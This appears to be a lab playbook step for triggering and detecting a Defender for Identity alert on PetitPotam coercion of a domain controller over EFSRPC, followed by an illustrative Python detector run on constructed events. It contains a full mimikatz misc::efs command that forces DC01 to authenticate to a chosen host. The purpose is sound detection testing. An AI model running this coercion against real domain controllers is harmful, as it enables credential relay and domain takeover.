
Task 5.1: Suspicious network connection over Encrypting File System Remote Protocol

This detection is triggered when an attacker tries to take over an Active Directory domain by abusing the Encrypting File System Remote (EFSRPC) Protocol: an EFSRPC call sent to a domain controller can carry a UNC path on a host the attacker controls, which coerces the domain controller into authenticating to that host (the technique known as PetitPotam). The alert is raised on the suspicious EFSRPC connection to the domain controller itself, not on whatever the attacker does with the coerced authentication afterwards.

Tools used in this test: https://github.com/gentilkiwi/mimikatz/releases.

  1. Switch to the WIN5 RDP session, logged in as MSMDI\JeffL.

  2. In the Command window, run:

     c:\Tools\mimikatz_trunk\x64\mimikatz.exe "privilege::debug" "misc::efs /server:DC01 /connect:10.0.0.6 /noauth" "exit"

     The misc::efs module opens an EFSRPC connection to DC01 and passes it a UNC path on 10.0.0.6, so the domain controller tries to authenticate to that address; /noauth makes the RPC bind anonymous. The alert is raised on the EFSRPC request itself, so you can safely ignore any errors that appear when running the commands.
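To show what the sensor side of this alert has to look for, the following is an added example of the detection logic applied to constructed connection records; it is not code from this playbook or from Microsoft Defender for Identity. The event layout and field names, the host inventory (DC01 assumed at 10.0.0.4 with a second DC at 10.0.0.7, WIN5 at 10.0.0.5, a file server at 10.0.0.9) and the sample events are all assumptions made for the illustration. The two interface UUIDs are the real ones through which MS-EFSR is exposed.

```python
"""Detection logic for coerced authentication over EFSRPC (MS-EFSR).

Added example; not code from the playbook or from Microsoft Defender for
Identity. The event layout, field names, host inventory and sample events
below are constructed for illustration.
"""
from dataclasses import dataclass
from typing import List, Optional
import re

# DCE/RPC interface UUIDs through which MS-EFSR is reachable (documented in MS-EFSR).
EFSRPC_INTERFACES = {
    "df1941c5-fe89-4e79-bf10-463657acf44d": r"\pipe\efsrpc",
    "c681d488-d850-11d0-8c52-00c04fd90f7e": r"\pipe\lsarpc",
}

# Assumed lab inventory: DC01 and a second domain controller.
DOMAIN_CONTROLLERS = {"10.0.0.4", "10.0.0.7"}

# Extracts the host component of a UNC path such as \\10.0.0.6\share\file.
UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")


@dataclass(frozen=True)
class RpcEvent:
    ts: str
    src_ip: str
    dst_ip: str
    interface: str   # interface UUID the client bound to (assumed field)
    opnum: int       # 0 is EfsRpcOpenFileRaw in MS-EFSR
    auth_user: str   # empty when the bind was anonymous (mimikatz /noauth)
    filename: str    # UNC path carried in the request, empty if none


def analyze(ev: RpcEvent) -> Optional[dict]:
    """Return an alert for an EFSRPC call that looks like coercion, else None."""
    if ev.interface.lower() not in EFSRPC_INTERFACES:
        return None                      # not MS-EFSR at all
    if ev.dst_ip not in DOMAIN_CONTROLLERS:
        return None                      # EFS calls to a file server are ordinary use
    if ev.src_ip in DOMAIN_CONTROLLERS:
        return None                      # DC-to-DC traffic treated as expected (assumption)
    reasons = ["EFSRPC call to a domain controller from a non-DC host"]
    m = UNC_HOST.match(ev.filename)
    if m and m.group(1) != ev.dst_ip:
        # The DC will open this path itself and authenticate to that host:
        # this is the coercion the alert is about.
        reasons.append(f"request directs the DC to connect to {m.group(1)}")
    if not ev.auth_user:
        reasons.append("anonymous RPC bind")
    severity = "high" if len(reasons) > 1 else "medium"
    return {"ts": ev.ts, "src": ev.src_ip, "dc": ev.dst_ip,
            "pipe": EFSRPC_INTERFACES[ev.interface.lower()],
            "opnum": ev.opnum, "severity": severity, "reasons": reasons}


def run(events: List[RpcEvent]) -> List[dict]:
    """Evaluate every record and keep only the ones that produced an alert."""
    return [a for a in map(analyze, events) if a]


EFS = "df1941c5-fe89-4e79-bf10-463657acf44d"

# Constructed sample events: one coercion attempt (WIN5 -> DC01 with a UNC path
# on 10.0.0.6, anonymous bind, as in the mimikatz step) and three benign records.
SAMPLE_EVENTS = [
    RpcEvent("2024-01-01T10:00:00Z", "10.0.0.5", "10.0.0.4", EFS, 0, "",
             r"\\10.0.0.6\share\x.txt"),
    RpcEvent("2024-01-01T10:00:05Z", "10.0.0.7", "10.0.0.4", EFS, 0, "MSMDI\\DC02$",
             r"\\10.0.0.4\c$\doc.txt"),                      # DC to DC
    RpcEvent("2024-01-01T10:00:09Z", "10.0.0.5", "10.0.0.4",
             "12345778-1234-abcd-ef00-0123456789ab", 44, "MSMDI\\JeffL", ""),  # LSARPC, not EFSRPC
    RpcEvent("2024-01-01T10:00:12Z", "10.0.0.5", "10.0.0.9", EFS, 0, "MSMDI\\JeffL",
             r"\\10.0.0.9\data\report.docx"),                # file server, not a DC
]

if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert)
```

The three exclusions are where a real deployment needs care: the inventory of domain controllers must be complete, or DC-to-DC EFSRPC traffic produces noise, and a host that legitimately uses EFS against a DC will still be flagged at medium severity, which is the intended behaviour for a DC that should not be serving EFS at all.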

For more information, review Suspicious network connection over Encrypting File System Remote Protocol (external ID 2416).